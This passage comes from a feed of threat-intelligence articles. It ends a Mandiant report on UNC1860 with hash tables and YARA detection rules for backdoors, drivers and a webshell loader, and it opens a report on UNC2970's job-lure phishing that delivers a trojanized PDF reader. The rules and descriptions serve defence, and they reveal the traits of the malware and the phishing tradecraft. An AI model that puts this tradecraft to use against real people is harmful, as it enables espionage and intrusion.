border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">3d5d05f230ae702c04098de512d93d48</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a038975255d3dda636d86ccd307f7838</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">31f2369d2e38c78f5b3f2035dba07c08</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code 
style="vertical-align: baseline;">c21eefc65cda49f17ddd1d243a7bffb5</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c8fa0ce3ae6a13af640607ea606c55f9</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2cece71e107d12ffd74b2fb24bf339a6</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fa1c6f7a5e02374b9d33de2578cb3399</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1e896f026246872b2feb4f8e3e093815</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">57c916da83cc634af22bde0ad44d0db3</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">07db3058e32fe5f36823dc7092cd7d5b</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">3dd829fb27353622eff34be1eabb8f18</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1e6679cd25d1bb127a0bec665adcf21e</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2e803d28809be2a0216f25126efde37b</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2398a83f10329a107801d3d23d06f7cb</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: 
baseline;">73fb0fe5cd96a14a4f85639223aec6a8</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">85427a8a47c4162b48d8dfb37440665d</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a500561c0b374816972094c2aa90da2a</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a65ee1a82975ee4c8d4e70219e1bfff5</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ce537dd649a391e52c27a3f88a0a8912</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">e67687b4443f58d2b0a465e3af3caffe</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b34883fb1630db43e06a38cebfa0bce2</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">46804472541ed61cc904cd14be18fe1d</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4de802f7e61cb8c820a02e042b58b215</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">929b12bc9f9e5f8e854de1d46ebf40d9</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f0dfb7bf01c0412891da8fa2702f4c7b</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: 
baseline;">b219672bcd60ce9a81b900217b3b5864</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fc90907e70f18c7f6a6b9d9599b6f97c</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d1e45afbfd3424612b4a4218cc7357ef</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">da0085a97c38ead734885e5cced1847f</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">490590bfdeeedf44b3ae306409bb0d03</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">e86e885e6c96ac72482741d8696c17fb</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ca3f0d25f7da0e8cde8e1f367451c77a</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">7b2fa099d51fa3885766f6d60d768748</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">6626dbe74acd15d06ff6900071ef240c</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3>YARA Rules</h3></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_DropperMemonly_WINTAPIX_1
{
    meta:
        author = "Mandiant"
        description = "wintapix malware family"
        created = "06/26/2023"
        modified = "06/26/2023"
        version = "1.0"
    strings:
        $p00_0 = {84ec5ff5f84863f6e9[4]66458b65??4981c5[4]4d0faccf}
        $p00_1 = {0f16c00f11014c03c14883c1??4883e1??4c2bc14d8bc849c1e9??74}
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
        ( ($p00_0 in (660000..690000) and $p00_1 in (9700..20000)) )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"

rule M_WINTAPIX_StringDecodingMethod_1
{
    meta:
        author = "Mandiant"
        hash1 = "286bd9c2670215d3cb4790aac4552f22"
        hash2 = "4dd6250eb2d368f500949952eb013964"
        desc = "Detects the byte pattern of a string decoding method found in the WINTAPIX driver image"
    strings:
        $a1 = { 48 89 54 24 10 48 89 4C 24 08 48 83 EC 18 C7 04 24 00 00 00 00 48 63 04 24 48 8B 4C 24 ?? 0F BE 04 01 48 8B 4C 24 ?? 0F B6 49 ?? 33 C1 48 63 0C 24 48 8B 54 24 ?? 88 04 0A 8B 04 24 FF C0 89 04 24 8B 04 24 FF C8 48 98 48 8B 4C 24 ?? 0F B6 04 01 85 C0 75 }
    condition:
        uint16(0) == 0x5A4D and filesize &lt; 1MB and pe.subsystem == pe.SUBSYSTEM_NATIVE and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"

rule M_WINTAPIX_PaddedStrings_1
{
    meta:
        author = "Mandiant"
        hash1 = "286bd9c2670215d3cb4790aac4552f22"
        hash2 = "4dd6250eb2d368f500949952eb013964"
        desc = "Detects unique strings found in the WINTAPIX driver image"
    strings:
        $a1 = { CC CC CC CC CC CC CC 4E 74 44 65 6C 61 79 45 78 65 63 75 74 69 6F 6E 00 }
        $a2 = { CC CC CC CC CC 5C 00 }
        $a3 = "InitSafeBootMode" ascii fullword
    condition:
        uint16(0) == 0x5A4D and pe.subsystem == pe.SUBSYSTEM_NATIVE and filesize &lt; 1MB and
        ( ( all of them and #a2 == 2 ) or pe.imphash() == "8d070a93a45ed8ba6dba6bfbe0d084e7" )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "dotnet"

rule M_UNC1860_TEMPLEDOOR_Strings_1
{
    meta:
        author = "Mandiant"
        date = "28/02/2024"
        hash1 = "caffdb648a0a68cd36694f0f0c7699d7"
        desc = "Detects the TEMPLEDOOR family based on unique strings"
        comment = "Triggers on TUNNELBOI sample c517519097bff386dc1784d98ad93f9d"
    strings:
        $url = "{0}://+:{1}/{2}/" wide fullword
        $a1 = "+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIi8" wide
        $b1 = "Jet" wide fullword
        $b2 = " Ver" wide fullword
        $b3 = "CmD" wide fullword
        $c1 = "Command" wide fullword
        $c2 = "Upload" wide fullword
        $c3 = "Download" wide fullword
        $c4 = "Load" wide fullword
        $c5 = "Rundll" wide fullword
        $c6 = "ERROR" wide fullword
    condition:
        int16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and dotnet.is_dotnet and $url and
        ( $a1 or 2 of ($b*) or 5 of ($c*) )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "dotnet"

rule M_UNC1860_TEMPLEDOOR_BytePatterns_1
{
    meta:
        author = "Mandiant"
        date = "28/02/2024"
        hash1 = "caffdb648a0a68cd36694f0f0c7699d7"
        desc = "Detects the TEMPLEDOOR family based on unique byte patterns"
        comment = "Triggers on TUNNELBOI sample c517519097bff386dc1784d98ad93f9d and on WINPAY sample b219672bcd60ce9a81b900217b3b5864"
    strings:
        // Packet encoding method MSIL
        $encode_msil = { 7E ?? ?? 00 04 1F 41 1F 61 6F ?? ?? 00 0A D2 0A 02 2C 07 02 8E 16 FE 03 2B 01 16 2C 69 16 0B 2B 0F 02 07 02 07 91 06 61 19 58 D2 9C 07 17 58 0B 07 02 8E 69 FE 04 2D E9 02 28 ?? ?? 00 0A }
        $encryption_key = { 54 62 2d 0c 03 45 49 15 2b 43 59 4a 4e 0c 40 }
    condition:
        int16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and dotnet.is_dotnet and any of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_OBFUSLAY_UNC1860_1
{
    meta:
        desc = "Detects the UNC1860 OBFUSLAY malware by its string decryption method"
        rs1 = "b66919a18322aa4ce2ad47d149b7fe38063cd3cfa2e4062cd1a01ad6b3e47651"
    strings:
        $a1 = { FE 09 00 00 6F ?? 00 00 0A FE 0E 00 00 FE 0C 00 00 20 02 00 00 00 5B 8D ?? 00 00 01 FE 0E 01 00 20 00 00 00 00 FE 0E 04 00 38 39 00 00 00 FE 0C 01 00 FE 0C 04 00 20 02 00 00 00 5B FE 09 00 00 FE 0C 04 00 20 02 00 00 00 6F ?? 00 00 0A 20 10 00 00 00 28 ?? 00 00 0A 9C FE 0C 04 00 20 02 00 00 00 58 FE 0E 04 00 FE 0C 04 00 FE 0C 00 00 3F BA FF FF FF FE 0C 01 00 }
    condition:
        uint16(0) == 0x5A4D and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_CRYPTOSLAY_UNC1860_1
{
    meta:
        desc = "Detects the UNC1860 CRYPTOSLAY malware by its string decryption method"
        rs1 = "3F2FD2DFD27BF3CAFCBF0946E308832E11A1D9C1D98FB04AC848E023E6720F53"
        rs2 = "5c1a42e9baaec115df337d2f4a9dcce8d73f29375921827e367fcba8499cdfa2"
    strings:
        $a1 = { FE 09 00 00 6F ?? 00 00 0A FE 0E 00 00 FE 0C 00 00 20 02 00 00 00 5B 8D ?? 00 00 01 FE 0E 01 00 20 00 00 00 00 FE 0E 04 00 38 39 00 00 00 FE 0C 01 00 FE 0C 04 00 20 02 00 00 00 5B FE 09 00 00 FE 0C 04 00 20 02 00 00 00 6F ?? 00 00 0A 20 10 00 00 00 28 ?? 00 00 0A 9C FE 0C 04 00 20 02 00 00 00 58 FE 0E 04 00 FE 0C 04 00 FE 0C 00 00 3F BA FF FF FF 28 ?? 00 00 0A }
        $a2 = { FE 09 00 00 6F ?? 00 00 0A FE 0E 00 00 FE 0C 00 00 20 02 00 00 00 5B 8D ?? 00 00 01 FE 0E 01 00 20 00 00 00 00 FE 0E 06 00 38 39 00 00 00 FE 0C 01 00 FE 0C 06 00 20 02 00 00 00 5B FE 09 00 00 FE 0C 06 00 20 02 00 00 00 6F ?? 00 00 0A 20 10 00 00 00 28 ?? 00 00 0A 9C FE 0C 06 00 20 02 00 00 00 58 FE 0E 06 00 FE 0C 06 00 FE 0C 00 00 FE 04 FE 0E 07 00 FE 0C 07 00 3A B0 FF FF FF }
    condition:
        uint16(0) == 0x5A4D and any of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_DropperMemonly_OATBOAT_1
{
    meta:
        author = "autopatt"
        description = "oatboat malware family"
        created = "02/09/2024"
        modified = "02/09/2024"
        version = "1.0"
    strings:
        $p00_0 = {48897c24??55488bec4883ec??488bf9c745[5]33dbc745[5]488d4d}
        $p00_1 = {443ac975??48ffc64883c3??493bf372??498b42??4885c075}
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
        ( ($p00_0 in (250..6500) and $p00_1 in (0..6000)) )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule SASHEYAWAY_Strings_1
{
    meta:
        desc = "Strings observed in the webshell loader"
        rs1 = "2538767f13218503bccf31fccb74e7531994b69a36a3780b53ba5020d938af20"
    strings:
        $ = "FromBase64String"
        $ = "Page Language=\"C#\""
        $ = "private static System.Reflection.Assembly"
        $ = "Page_Load"
        $ = "System.Reflection.MethodInfo"
        $ = "Activator.CreateInstance"
        $ = "Invoke"
    condition:
        all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Backdoor_TOFULOAD_1
{
    meta:
        author = "Mandiant"
        date_created = "2023-08-15"
        date_modified = "2023-08-15"
        description = "This is a hunting rule to look for TOFULOAD backdoor used by UNC1860"
        md5 = "d1ce3117060e85247145c82005dda985"
    strings:
        $s1 = {66 77 88 99 48 8D [2] C7 [2] 52 74 6C 52} // 0x99887766; LEA ??, ??; MOV ??, 'RltR';
        $s2 = {B8 E1 83 0F 3E F7 [1] C1 [1] 03 0F [2] 6B [1] 21} // MOV ??, 0x3E0F83E1; MUL ??, ??; SHR ??, 03; MOVZX ??, ??; IMUL ??, ??, 21;
        $s3 = {FF [1] 40 [2] 43 32 [2] 41 88 [3] 44 8B [1] 4D [2] 7C} // INC ??; MOV ??, ??; XOR ??, ??; MOV ??, ??; MOV ??, ??; CMP ??, ??; JL
    condition:
        filesize &lt; 50KB and any of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "dotnet"

rule M_UNC1860_TEMPLEDROP_Strings_2
{
    meta:
        author = "Mandiant"
        date = "28/02/2024"
        hash1 = "6d3041b89484c273376e5189e190d235"
        desc = "Detects the TEMPLEDROP family based on unique strings"
        comment = "Triggers on TEMPLEDOOR controller sample c517519097bff386dc1784d98ad93f9d"
    strings:
        $a1 = "Nothing changed :D" wide fullword
        $a2 = "Access: KO" wide fullword
        $a3 = "Eventlog stoped." wide fullword
        $b1 = "The Microsoft Exchange Self Protection Driver." wide fullword
        $b2 = "The Microsoft Exchange Filter Driver." wide fullword
        $c1 = "Create RegKey: " wide
        $c2 = "Create Service: " wide
        $c3 = "Test Event lock: " wide
        $c4 = "Test http listner: " wide
        $c5 = "Test IO Changes: " wide
        $c6 = "Test 'Event lock': " wide
        $d1 = "no active http port to listen." wide
        $d2 = "Prefixes.Add Error , " wide
        $d3 = "' driver service created and started." wide
        $d4 = "' service started." wide
        $d5 = "Unhandled exception on create reg key " wide
        $d6 = "Failed to change file 'CreationTime'." wide
    condition:
        int16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and dotnet.is_dotnet and
        ( 1 of ($a*) or 1 of ($b*) or 2 of ($c*) or 2 of ($d*) )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_Backdoor_TOFUDRV_1
{
    meta:
        author = "Mandiant"
        description = "tofudrv malware family"
        created = "11/29/2023"
        modified = "11/29/2023"
        version = "1.0"
    strings:
        $p00_0 = {eb??33c083f8??0f85[4]488b4c24??e8[4]eb??c74424[5]eb}
        $p00_1 = {f3aa41b8[4]33d2488d4c24??e8[4]488b8424[4]48898424[4]48638424[4]48898424}
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
        ( ($p00_0 in (34000..45000) and $p00_1 in (28000..39000)) )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"

rule M_TOFUDRV_Strings_1
{
    meta:
        author = "Mandiant"
        hash = "b4b1e285b9f666ae7304a456da01545e"
        desc = "Detects cleartext strings that appear in the TOFUDRV image"
    strings:
        $a1 = "\\systemroot\\system32\\drivers" ascii fullword
        $a2 = "\\SafeBoot\\Minimal\\" ascii fullword
        $a3 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Control" ascii fullword
        $a4 = "\\SafeBoot\\Network\\" ascii fullword
        $a5 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ascii fullword
        $a6 = "Found" ascii fullword
    condition:
        uint16(0) == 0x5A4D and filesize &lt; 500KB and pe.subsystem == pe.SUBSYSTEM_NATIVE and
        ( 3 of them or pe.imphash() == "ff6f16b00c9f36b32cd60fecd4dfc8e9" )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"

rule M_TOFUDRV_RtlSubtreeStackStrings_1
{
    meta:
        author = "Mandiant"
        hash = "b4b1e285b9f666ae7304a456da01545e"
        desc = "Detects a stack string byte pattern in a function intended to resolve the memory image base of ntoskrnl.exe in TOFUDRV"
    strings:
        // "RtlSubtreePredecessor"
        $a1 = { C6 44 24 ?? 52 C6 44 24 ?? 74 C6 44 24 ?? 6C C6 44 24 ?? 53 C6 44 24 ?? 75 C6 44 24 ?? 62 C6 44 24 ?? 74 C6 44 24 ?? 72 C6 44 24 ?? 65 C6 44 24 ?? 65 C6 44 24 ?? 50 C6 44 24 ?? 72 C6 44 24 ?? 65 C6 44 24 ?? 64 C6 44 24 ?? 65 }
        // "RtlSubtreeSuccessor"
        $a2 = { C6 84 24 ?? 00 00 00 6C C6 84 24 ?? 00 00 00 53 C6 84 24 ?? 00 00 00 75 C6 84 24 ?? 00 00 00 62 C6 84 24 ?? 00 00 00 74 C6 84 24 ?? 00 00 00 72 C6 84 24 ?? 00 00 00 65 C6 84 24 ?? 00 00 00 65 C6 84 24 ?? 00 00 00 53 C6 84 24 ?? 00 00 00 75 }
        $KeGetPcr = { 65 48 8B 04 25 18 00 00 00 48 89 44 24 }
    condition:
        uint16(0) == 0x5A4D and filesize &lt; 500KB and pe.subsystem == pe.SUBSYSTEM_NATIVE and $KeGetPcr and any of ($a*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Dropper_MSIL_TEMPLESHOT_1
{
    meta:
        author = "Mandiant"
        date_created = "2020-05-22"
        date_modified = "2020-05-22"
        md5 = "6d3041b89484c273376e5189e190d235"
        rev = 2
    strings:
        $ss1 = "--install" fullword wide
        $ss2 = "' directory created." fullword wide
        $ss3 = "' file created." fullword wide
        $ss4 = "' service created." fullword wide
        $ss5 = "Nothing changed :D" fullword wide
        $ss6 = "\x00ProtectDriver\x00"
        $ss7 = "\x00WriteAllBytes\x00"
        $ss8 = "\x00CopyTime\x00"
        $ss9 = "T\x00V\x00q\x00Q\x00"
    condition:
        ( uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 ) and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Backdoor_MSIL_TEMPLESHOT_2
{
    meta:
        author = "Mandiant"
        date_created = "2020-05-22"
        date_modified = "2020-05-22"
        md5 = "a991bdbf1e36d7818d7a340a35a4ea26"
        rev = 2
    strings:
        $sb1 = { 02 7B [2] 00 04 [0-8] FE 03 [0-8] 39 [4-8] 02 7B [2] 00 04 [5] 0? 02 7B [2] 00 04 [5-12] 0C }
        $sb2 = { 7B [2] 00 04 [0-16] 13 ?? 11 [1-8] 17 59 45 04 00 00 00 02 [4-64] 2B ?? 02 [1-2] 7B [2] 00 04 73 [2] 00 06 28 [2] 00 06 0A 2B ?? 02 [1-2] 7B [2] 00 04 73 [2] 00 06 28 [2] 00 06 [0-4] 0A 2B }
        $ss1 = "\x00set_UseShellExecute\x00"
        $ss2 = "\x00HttpListenerRequest\x00"
        $ss3 = "\x00HttpListenerResponse\x00"
        $ss4 = "\x00HttpListener\x00"
    condition:
        ( uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 ) and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Backdoor_MSIL_TEMPLESHOT_1
{
    meta:
        author = "Mandiant"
        date_created = "2020-05-22"
        date_modified = "2020-05-22"
        md5 = "952482949f495fb66e493e441229ae4b"
        rev = 2
    strings:
        $sb1 = { 06 17 7D [4] 06 20 36 01 00 C0 7D [4] DE 00 07 15 3B [4] 07 28 [4-12] 0D [8-64] 11 06 [4-12] 13 07 11 07 39 [4-32] 20 FF FF 1F 00 12 09 [0-12] 11 09 12 0A [4-12] 12 0A 11 07 }
        $ss1 = "\x00GetProcessById\x00"
        $ss2 = "\x00NtOpenThread\x00"
        $ss3 = "\x00NtQueryInformationThread\x00"
        $ss4 = "\x00ReadProcessMemory\x00"
        $ss5 = "\x00NtTerminateProcess\x00"
        $ss6 = "\x00set_UseShellExecute\x00"
        $ss7 = "\x00DESCryptoServiceProvider\x00"
        $ss8 = "\x00GetExecutingAssembly\x00"
    condition:
        ( uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 ) and all of them
}</code></pre></div></description><pubDate>Thu, 19 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF 
Reader</title><link>https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Marco Galli, Diana Ion, Yash Gupta, Adrian Hernandez, Ana Martinez Gomez, Jon Daniels, Christopher Gardner</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2 style="text-align: left;"><span style="vertical-align: baseline;">Introduction</span></h2> <p><span style="vertical-align: baseline;">In June 2024, </span><a href="https://cloud.google.com/security/products/managed-defense"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant Managed Defense</span></a><span style="vertical-align: baseline;"> identified a cyber espionage group suspected to have a North Korea nexus, tracked by Mandiant as UNC2970. Later that month, Mandiant discovered additional phishing lures masquerading as an energy company and as an entity in the aerospace industry to target victims in these verticals.</span></p> <p><span style="vertical-align: baseline;">UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies. Mandiant has observed UNC2970 copy and tailor job descriptions to fit their respective targets.</span></p> <p><span style="vertical-align: baseline;">UNC2970 engaged with the victim over email and WhatsApp and ultimately shared a malicious archive purported to contain the job description in PDF format. The PDF file is encrypted and can only be opened with the included trojanized version of SumatraPDF, which ultimately delivers the MISTPEN backdoor via the BURNBOOK launcher. </span></p> <p><span style="font-style: italic; vertical-align: baseline;">Mandiant observed UNC2970 modify the open-source code of an older SumatraPDF version as part of this campaign. This is not a compromise of SumatraPDF, nor is there any inherent vulnerability in SumatraPDF. 
Upon discovery, Mandiant alerted SumatraPDF of this campaign for general awareness.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Overview</span></h2> <p><span style="vertical-align: baseline;">UNC2970 relies on legitimate job description content to target victims employed in U.S. critical infrastructure verticals. The job description is delivered to the victim in a password-protected ZIP archive containing an encrypted PDF file and a modified version of an open-source PDF viewer application. </span></p> <p><span style="vertical-align: baseline;">Mandiant noted slight modifications between the delivered job descriptions and their originals, including the required qualifications, experience and skills, likely to better align with the victim's profile. Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees.</span></p> <p><span style="vertical-align: baseline;">To illustrate this, Mandiant analyzed the differences between the original job description and UNC2970's job description included in the ZIP archive.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig1.max-1000x1000.png" alt="Page 1 of PDF lure"> </a> <figcaption class="article-image__caption "><p data-block-key="dnufk">Figure 1: Page 1 of PDF lure</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For example, under the "Required Education, Experience, &amp; Skills</span><strong style="vertical-align: baseline;">" </strong><span style="vertical-align: baseline;">section, the original post 
mentions "</span><span style="font-style: italic; vertical-align: baseline;">United States Air Force or highly comparable experience</span><span style="vertical-align: baseline;">," while the malicious PDF omits this line. Another omitted line is under the "Preferred Education, Experience, &amp; Skills"</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">section, where the original job description includes "</span><span style="font-style: italic; vertical-align: baseline;">Preferred location McLean, Virginia</span><span style="vertical-align: baseline;">."</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig2.max-1000x1000.png" alt="Original vs. modified"> </a> <figcaption class="article-image__caption "><p data-block-key="fkwpw">Figure 2: Original vs. modified</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Additionally, Mandiant discovered a similar ZIP archive uploaded to VirusTotal with an identical structure but a different job description. The PDF content is consistent with a legitimate job description from the nuclear energy sector.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">The Infection Chain Explained</span></h2> <p><a href="https://cloud.google.com/security/products/managed-defense"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant Managed Defense</span></a><span style="vertical-align: baseline;"> discovered that the victim downloaded and opened a password-protected ZIP archive received through a WhatsApp chat, expecting to see a document containing a job description. 
Upon analysis, the ZIP archive contains several files, briefly described in Table 1:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 
